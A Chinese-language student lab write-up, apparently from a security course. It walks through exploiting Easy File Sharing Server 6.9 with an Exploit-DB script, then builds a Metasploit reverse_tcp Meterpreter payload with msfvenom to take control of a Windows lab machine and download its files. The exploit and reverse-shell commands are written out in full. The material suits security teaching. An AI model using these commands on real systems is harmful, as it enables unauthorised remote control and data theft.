一、漏洞渗透测试
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
2、利用Nmap扫描发现靶机(Windows)运行了该服务。
3、利用该漏洞,使得靶机运行计算器。 见第六章PPT或PDF文档
(一)靶机安装easy file sharing server
一直点next,最后点击try it。 因为靶机上80端口被占用了,所以在这里设置一下服务部署的端口为8080,点击Restart
这里可以看到端口号和ip地址,或者运行cmd,也可以查看到IP地址。
(二)打开easy file sharing server,在kali终端输入nmap -sV 192.168.5.30命令进行扫描,发现靶机上的8080端口运行着“easy file sharing server”软件,版本为6.9
(三)输入searchsploit命令
searchsploit easy file sharing server
查找和easy file sharing server有关的漏洞。
(四)接下来利用溢出漏洞实现在靶机执行计算器程序,
输入命令 python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.5.30 8080
(五)用python运行这个脚本,运行成功。回到靶机,发现计算器自动打开了,漏洞复现完毕。
二、Metasploit应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。见课本P127-133
(一)生成被控端
命令(要在root下运行):
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.124.140 lport=5000 -f exe -o /root/payload.exe
msfvenom:Metasploit程序内置的远程控制命令。
lhost=接收端的ip(自己的kali的ip)。
-o:存放payload.exe的路径,我选择的是把payload.exe下载在root文件夹里,即/root/payload.exe,也可以直接存放在桌面。
而后以管理员身份打开root文件夹,将下载好的payload.exe复制到靶机上。
(二)启动主控端
在终端输入msfconsole启动Metasploit,使用handler作为主控端。
(三)在靶机中运行被控端程序
按照顺序执行,以下命令,其中lhost是自己kali的IP地址
(四)靶机上运行payload.exe程序 ,返回kali发现在Metasploit中打开了一个session。
(五)输入ls命令,查看靶机系统上所有的文件
(六)下载靶机上的文件
随便选择下载一个文件,我选择下载的是“hyyyyy.txt”
根据路径即可找到下载成功的文件